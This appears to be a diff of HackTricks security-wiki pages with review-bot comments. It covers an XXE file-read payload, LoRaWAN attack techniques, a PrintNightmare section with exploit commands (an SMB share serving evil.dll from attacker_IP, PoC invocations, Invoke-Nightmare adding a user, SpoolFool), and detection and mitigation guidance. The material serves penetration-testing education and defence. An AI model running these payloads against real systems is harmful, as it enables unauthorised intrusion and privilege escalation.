<!DOCTYPE colors [
<!ENTITY % a '
<!ENTITY % file SYSTEM "file:///tmp/flag.txt">
<!ENTITY % b "<!ENTITY c SYSTEM 'meow://%file;'>">
'>
%a; %b;
]>
<colors>&c;</colors>
```
#### Key takeaways
* **Parameter entities** are still expanded by libxml2 even when `resolve_entities` should block XXE.
* An **invalid URI** or **non-existent file** is enough to concatenate controlled data into the thrown exception.
* The technique works **without outbound connectivity**, making it ideal for strictly egress-filtered environments.
#### Mitigation guidance
* Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**.
* Disable `load_dtd` and/or `resolve_entities` unless absolutely required.
* Avoid returning raw parser errors to the client.
## References
- [https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf](https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-slides.pdf)
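Review bot: the mitigation bullet "Upgrade to **lxml ≥ 5.4.0** and ensure the underlying **libxml2** is **≥ 2.13.8**" sits under a heading that says "libxml2 still vulnerable", so the hunk should state whether 2.13.8 closes the general-entity variant from section 2 or only the parameter-entity case from section 1; as written a reader cannot tell which bypass the version bump addresses. The next bullet, "Disable `load_dtd` and/or `resolve_entities` unless absolutely required", is weaker than the key takeaway a few lines above ("Parameter entities are still expanded by libxml2 even when `resolve_entities` should block XXE"): make it "and", not "and/or", and keep "Avoid returning raw parser errors to the client" as the explicit second layer, since both variants on this page leak only through the exception text. Finally, the TIP line "double-encode them (`&#x26;#x25;``%`)" appears to have lost the separator between the encoded form and `%`; restore the arrow so the mapping is readable.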
@ -784,4 +843,7 @@ https://github.com/luisfontes19/xxexploiter
- [https://portswigger.net/web-security/xxe](https://portswigger.net/web-security/xxe)
- [https://gosecure.github.io/xxe-workshop/#7](https://gosecure.github.io/xxe-workshop/#7)
- [Dojo CTF Challenge #42 Hex Color Palette XXE write-up](https://www.yeswehack.com/dojo/dojo-ctf-challenge-winners-42)
- [lxml bug #2107279 Parameter-entity XXE still possible](https://bugs.launchpad.net/lxml/+bug/2107279)
{{#include ../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# Fault Injection Attacks
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit. This attacks opens a lot of possibilities for attacking electronic circuits. This attack is also referred as glitching of electronic circuits.
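Review bot: while this file is being touched, the context line "Fault injections attacks includes introducing external distrubance in electronic circuits to influence it's behaviour, resulting to disclose information or even bypass certian restrictions in the circuit" needs a grammar pass; suggest "Fault injection attacks introduce an external disturbance into an electronic circuit to influence its behaviour, causing it to disclose information or bypass certain restrictions". The following sentences have the same problem: "This attacks opens" should be "These attacks open" and "also referred as" should be "also referred to as".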
@ -8,4 +8,4 @@ There are a lot of methods and mediums for injecting fault into an electronic ci
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# Side Channel Analysis Attacks
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it. This can be explained better with an example:
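Review bot: the context sentence "Side Channel Analysis Attacks refers to determining the information from a device or entity by some other channel or source that has an indirect influence on it and information can be extracted from it" is a run-on with a subject/verb mismatch; suggest "Side-channel analysis attacks recover information about a device through a secondary channel that is only indirectly influenced by its operation, but from which that information can still be extracted", which keeps the lead-in to the example that follows.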
@ -10,4 +10,4 @@ These attacks are very popular in case of leaking data such as private keys or f
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# Industrial Control Systems Hacking
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## About this Section
@ -18,5 +18,4 @@ These techniques can also be used to protect against attacks and blue teaming fo
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# The Modbus Protocol
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
## Introduction to Modbus Protocol
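Review bot: the context line in the second hunk of this file, "Due to it's large scale use and lack of upgradations, attacking Modbus provides", should read "Due to its large-scale use and lack of upgrades, attacking Modbus provides"; worth fixing in the same commit since the file is already being edited.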
@ -34,6 +34,5 @@ Due to it's large scale use and lack of upgradations, attacking Modbus provides
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# Investment Terms
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Spot
@ -71,4 +71,4 @@ However, the buyer will be paying some fee to the seller for opening the option
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

@ -1,6 +1,5 @@
# Radio Hacking
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# FISSURE - The RF Framework
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
**Frequency Independent SDR-based Signal Understanding and Reverse Engineering**
@ -187,5 +187,4 @@ Special thanks to Dr. Samuel Mantravadi and Joseph Reith for their contributions
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

@ -4,16 +4,96 @@
## Introduction
**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide area network technologies designed for **long-range communications** at a low bit rate.\
**Low-Power Wide Area Network** (LPWAN) is a group of wireless, low-power, wide-area network technologies designed for **long-range communications** at a low bit rate.
They can reach more than **six miles** and their **batteries** can last up to **20 years**.
Long Range (**LoRa**) its popular in multiple countries and has an open source specification called **LoRaWAN**.
Long Range (**LoRa**) is currently the most deployed LPWAN physical layer and its open MAC-layer specification is **LoRaWAN**.
### LPWAN, LoRa, and LoRaWAN
---
[https://github.com/IOActive/laf](https://github.com/IOActive/laf)
## LPWAN, LoRa, and LoRaWAN
* LoRa Chirp Spread Spectrum (CSS) physical layer developed by Semtech (proprietary but documented).
* LoRaWAN Open MAC/Network layer maintained by the LoRa-Alliance. Versions 1.0.x and 1.1 are common in the field.
* Typical architecture: *end-device → gateway (packet-forwarder) → network-server → application-server*.
> The **security model** relies on two AES-128 root keys (AppKey/NwkKey) that derive session keys during the *join* procedure (OTAA) or are hard-coded (ABP). If any key leaks the attacker gains full read/write capability over the corresponding traffic.
---
## Attack surface summary
| Layer | Weakness | Practical impact |
|-------|----------|------------------|
| PHY | Reactive / selective jamming | 100 % packet loss demonstrated with single SDR and <1 W output |
| MAC | Join-Accept & data-frame replay (nonce reuse, ABP counter rollover) | Device spoofing, message injection, DoS |
| Network-Server | Insecure packet-forwarder, weak MQTT/UDP filters, outdated gateway firmware | RCE on gateways → pivot into OT/IT network |
| Application | Hard-coded or predictable AppKeys | Brute-force/decrypt traffic, impersonate sensors |
---
## Recent vulnerabilities (2023-2025)
* **CVE-2024-29862** *ChirpStack gateway-bridge & mqtt-forwarder* accepted TCP packets that bypassed stateful firewall rules on Kerlink gateways, allowing remote management interface exposure. Fixed in 4.0.11 / 4.2.1 respectively .
* **Dragino LG01/LG308 series** Multiple 2022-2024 CVEs (e.g. 2022-45227 directory traversal, 2022-45228 CSRF) still observed unpatched in 2025; enable unauthenticated firmware dump or config overwrite on thousands of public gateways .
* Semtech *packet-forwarder UDP* overflow (unreleased advisory, patched 2023-10): crafted uplink larger than 255 B triggered stack-smash > RCE on SX130x reference gateways (found by Black Hat EU 2023 “LoRa Exploitation Reloaded”).
---
## Practical attack techniques
### 1. Sniff & Decrypt traffic
```bash
# Capture all channels around 868.3 MHz with an SDR (USRP B205)
python3 lorattack/sniffer.py \
--freq 868.3e6 --bw 125e3 --rate 1e6 --sf 7 --session smartcity
# Bruteforce AppKey from captured OTAA join-request/accept pairs
python3 lorapwn/bruteforce_join.py --pcap smartcity.pcap --wordlist top1m.txt
```
### 2. OTAA join-replay (DevNonce reuse)
1. Capture a legitimate **JoinRequest**.
2. Immediately retransmit it (or increment RSSI) before the original device transmits again.
3. The network-server allocates a new DevAddr & session keys while the target device continues with the old session → attacker owns vacant session and can inject forged uplinks.
### 3. Adaptive Data-Rate (ADR) downgrading
Force SF12/125 kHz to increase airtime → exhaust duty-cycle of gateway (denial-of-service) while keeping battery impact low on attacker (just send network-level MAC commands).
### 4. Reactive jamming
*HackRF One* running GNU Radio flowgraph triggers a wide-band chirp whenever preamble detected blocks all spreading factors with ≤200 mW TX; full outage measured at 2 km range .
---
## Offensive tooling (2025)
| Tool | Purpose | Notes |
|------|---------|-------|
| **LoRaWAN Auditing Framework (LAF)** | Craft/parse/attack LoRaWAN frames, DB-backed analyzers, brute-forcer | Docker image, supports Semtech UDP input |
| **LoRaPWN** | Trend Micro Python utility to brute OTAA, generate downlinks, decrypt payloads | Demo released 2023, SDR-agnostic |
| **LoRAttack** | Multi-channel sniffer + replay with USRP; exports PCAP/LoRaTap | Good Wireshark integration |
| **gr-lora / gr-lorawan** | GNU Radio OOT blocks for baseband TX/RX | Foundation for custom attacks |
---
## Defensive recommendations (pentester checklist)
1. Prefer **OTAA** devices with truly random DevNonce; monitor duplicates.
2. Enforce **LoRaWAN 1.1**: 32-bit frame counters, distinct FNwkSIntKey / SNwkSIntKey.
3. Store frame-counter in non-volatile memory (**ABP**) or migrate to OTAA.
4. Deploy **secure-element** (ATECC608A/SX1262-TRX-SE) to protect root keys against firmware extraction.
5. Disable remote UDP packet-forwarder ports (1700/1701) or restrict with WireGuard/VPN.
6. Keep gateways updated; Kerlink/Dragino provide 2024-patched images.
7. Implement **traffic anomaly detection** (e.g., LAF analyzer) flag counter resets, duplicate joins, sudden ADR changes.
## References
* LoRaWAN Auditing Framework (LAF) https://github.com/IOActive/laf
* Trend Micro LoRaPWN overview https://www.hackster.io/news/trend-micro-finds-lorawan-security-lacking-develops-lorapwn-python-utility-bba60c27d57a
{{#include ../../banners/hacktricks-training.md}}
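Review bot: the line "[https://github.com/IOActive/laf](https://github.com/IOActive/laf)" is left orphaned between the removed "### LPWAN, LoRa, and LoRaWAN" heading and the new "## LPWAN, LoRa, and LoRaWAN" heading, and it duplicates the References entry "LoRaWAN Auditing Framework (LAF) https://github.com/IOActive/laf"; drop it. In "Recent vulnerabilities", the Dragino bullet cites "2022-45227" and "2022-45228" without the `CVE-` prefix that the first bullet uses; write the full identifiers. The packet-forwarder bullet describes an "unreleased advisory" and attributes the finding to a Black Hat EU 2023 talk, but nothing in References backs it; add a link or mark it as unconfirmed. Three sentences end in " ." (after "respectively", "public gateways" and "2 km range"), which looks like a citation marker that was removed; either restore the references or delete the stray space. Lastly, checklist item 7, "Implement **traffic anomaly detection** (e.g., LAF analyzer) flag counter resets, duplicate joins, sudden ADR changes", fuses two clauses; add "to" or a colon before "flag".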

@ -1,6 +1,6 @@
# Rust Basics
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
### Generic Types
@ -320,5 +320,4 @@ fn main() {
```
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# Test LLMs
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
## Run & train models locally
@ -52,5 +52,4 @@ It offers several sections like:
* **API Access:** Simple APIs for running models the enable developers to deploy and scale models effortlessly within their own applications.
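Review bot: the context bullet "Simple APIs for running models the enable developers to deploy and scale models" should read "that enable developers"; a one-word fix worth folding into this commit.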
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

@ -1,6 +1,6 @@
# TimeRoasting
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}
timeRoasting, the main cause is the outdated authentication mechanism left by Microsoft in its extension to NTP servers, known as MS-SNTP. In this mechanism, clients can directly use any computer account's Relative Identifier (RID), and the domain controller will use the computer account's NTLM hash (generated by MD4) as the key to generate the **Message Authentication Code (MAC)** of the response packet.
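Review bot: the opening context sentence "timeRoasting, the main cause is the outdated authentication mechanism left by Microsoft in its extension to NTP servers, known as MS-SNTP" is a fragment with a dangling subject; suggest "The root cause of Timeroasting is the legacy authentication mechanism Microsoft kept in its NTP extension, MS-SNTP", and capitalise the name consistently with the page title. The rest of the paragraph is fine as it stands.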
@ -39,4 +39,4 @@ sudo ./timeroast.py 10.0.0.42 | tee ntp-hashes.txt
hashcat -m 31300 ntp-hashes.txt
```
{{#include /banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

@ -1,10 +1,106 @@
# PrintNightmare
# PrintNightmare (Windows Print Spooler RCE/LPE)
{{#include ../../banners/hacktricks-training.md}}
**Check this awesome blog post about PrintNightmare in 2024: [https://www.hackingarticles.in/understanding-printnightmare-vulnerability/](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)**
> PrintNightmare is the collective name given to a family of vulnerabilities in the Windows **Print Spooler** service that allow **arbitrary code execution as SYSTEM** and, when the spooler is reachable over RPC, **remote code execution (RCE) on domain controllers and file servers**. The most-widely exploited CVEs are **CVE-2021-1675** (initially classed as LPE) and **CVE-2021-34527** (full RCE). Subsequent issues such as **CVE-2021-34481 (“Point & Print”)** and **CVE-2022-21999 (“SpoolFool”)** prove that the attack surface is still far from closed.
---
## 1. Vulnerable components & CVEs
| Year | CVE | Short name | Primitive | Notes |
|------|-----|------------|-----------|-------|
|2021|CVE-2021-1675|“PrintNightmare #1”|LPE|Patched in June 2021 CU but bypassed by CVE-2021-34527|
|2021|CVE-2021-34527|“PrintNightmare”|RCE/LPE|AddPrinterDriverEx allows authenticated users to load a driver DLL from a remote share|
|2021|CVE-2021-34481|“Point & Print”|LPE|Unsigned driver installation by non-admin users|
|2022|CVE-2022-21999|“SpoolFool”|LPE|Arbitrary directory creation → DLL planting works after 2021 patches|
All of them abuse one of the **MS-RPRN / MS-PAR RPC methods** (`RpcAddPrinterDriver`, `RpcAddPrinterDriverEx`, `RpcAsyncAddPrinterDriver`) or trust relationships inside **Point & Print**.
## 2. Exploitation techniques
### 2.1 Remote Domain Controller compromise (CVE-2021-34527)
An authenticated but **non-privileged** domain user can run arbitrary DLLs as **NT AUTHORITY\SYSTEM** on a remote spooler (often the DC) by:
```powershell
# 1. Host malicious driver DLL on a share the victim can reach
impacket-smbserver share ./evil_driver/ -smb2support
# 2. Use a PoC to call RpcAddPrinterDriverEx
python3 CVE-2021-1675.py victim_DC.domain.local 'DOMAIN/user:Password!' \
-f \
'\\attacker_IP\share\evil.dll'
```
Popular PoCs include **CVE-2021-1675.py** (Python/Impacket), **SharpPrintNightmare.exe** (C#) and Benjamin Delpys `misc::printnightmare / lsa::addsid` modules in **mimikatz**.
### 2.2 Local privilege escalation (any supported Windows, 2021-2024)
The same API can be called **locally** to load a driver from `C:\Windows\System32\spool\drivers\x64\3\` and achieve SYSTEM privileges:
```powershell
Import-Module .\Invoke-Nightmare.ps1
Invoke-Nightmare -NewUser hacker -NewPassword P@ssw0rd!
```
### 2.3 SpoolFool (CVE-2022-21999) bypassing 2021 fixes
Microsofts 2021 patches blocked remote driver loading but **did not harden directory permissions**. SpoolFool abuses the `SpoolDirectory` parameter to create an arbitrary directory under `C:\Windows\System32\spool\drivers\`, drops a payload DLL, and forces the spooler to load it:
```powershell
# Binary version (local exploit)
SpoolFool.exe -dll add_user.dll
# PowerShell wrapper
Import-Module .\SpoolFool.ps1 ; Invoke-SpoolFool -dll add_user.dll
```
> The exploit works on fully-patched Windows 7 → Windows 11 and Server 2012R2 → 2022 before February 2022 updates
---
## 3. Detection & hunting
* **Event Logs** enable the *Microsoft-Windows-PrintService/Operational* and *Admin* channels and watch for **Event ID 808** “The print spooler failed to load a plug-in module” or for **RpcAddPrinterDriverEx** messages.
* **Sysmon** `Event ID 7` (Image loaded) or `11/23` (File write/delete) inside `C:\Windows\System32\spool\drivers\*` when the parent process is **spoolsv.exe**.
* **Process lineage** alerts whenever **spoolsv.exe** spawns `cmd.exe`, `rundll32.exe`, PowerShell or any unsigned binary .
## 4. Mitigation & hardening
1. **Patch!** Apply the latest cumulative update on every Windows host that has the Print Spooler service installed.
2. **Disable the spooler where it is not required**, especially on Domain Controllers:
```powershell
Stop-Service Spooler -Force
Set-Service Spooler -StartupType Disabled
```
3. **Block remote connections** while still allowing local printing Group Policy: `Computer Configuration → Administrative Templates → Printers → Allow Print Spooler to accept client connections = Disabled`.
4. **Restrict Point & Print** so only administrators can add drivers by setting the registry value:
```cmd
reg add "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint" \
/v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 1 /f
```
Detailed guidance in Microsoft KB5005652
---
## 5. Related research / tools
* [mimikatz `printnightmare`](https://github.com/gentilkiwi/mimikatz/tree/master/modules) modules
* SharpPrintNightmare (C#) / Invoke-Nightmare (PowerShell)
* SpoolFool exploit & write-up
* 0patch micropatches for SpoolFool and other spooler bugs
---
**More reading (external):** Check the 2024 walk-through blog post [Understanding PrintNightmare Vulnerability](https://www.hackingarticles.in/understanding-printnightmare-vulnerability/)
## References
* Microsoft *KB5005652: Manage new Point & Print default driver installation behavior*
<https://support.microsoft.com/en-us/topic/kb5005652-manage-new-point-and-print-default-driver-installation-behavior-cve-2021-34481-873642bf-2634-49c5-a23b-6d8e9a302872>
* Oliver Lyak *SpoolFool: CVE-2022-21999*
<https://github.com/ly4k/SpoolFool>
{{#include ../../banners/hacktricks-training.md}}
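Review bot: the `cmd` block under "Restrict Point & Print" splits the `reg add` command over two lines with a trailing backslash, which cmd.exe does not treat as a line continuation (it passes `\` as an argument and then tries to execute `/v RestrictDriverInstallationToAdministrators ...` as its own command); put the whole command on one line or use `^` as the continuation character. Related tagging issue in 2.1: the block is fenced as `powershell` but contains `impacket-smbserver` and `python3` invocations with backslash continuations, i.e. a bash session, so tag it `bash` so highlighting and copy/paste match. In "3. Detection & hunting", the first bullet names Event ID 808 but refers to "RpcAddPrinterDriverEx messages" without an ID; the driver-install event in Microsoft-Windows-PrintService/Operational is Event ID 316 ("Printer driver ... was added or updated"), which is what most hunts key on, so name it explicitly. The third detection bullet ends in " ." (stray space before the period), apparently a dropped citation; restore the reference or remove the space. The "Detailed guidance in Microsoft KB5005652" line should link to the KB entry already listed under References instead of leaving a bare mention.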

@ -1,6 +1,6 @@
# Cobalt Strike
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}
### Listeners
@ -371,5 +371,4 @@ pscp -r root@kali:/opt/cobaltstrike/artifact-kit/dist-pipe .
```
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}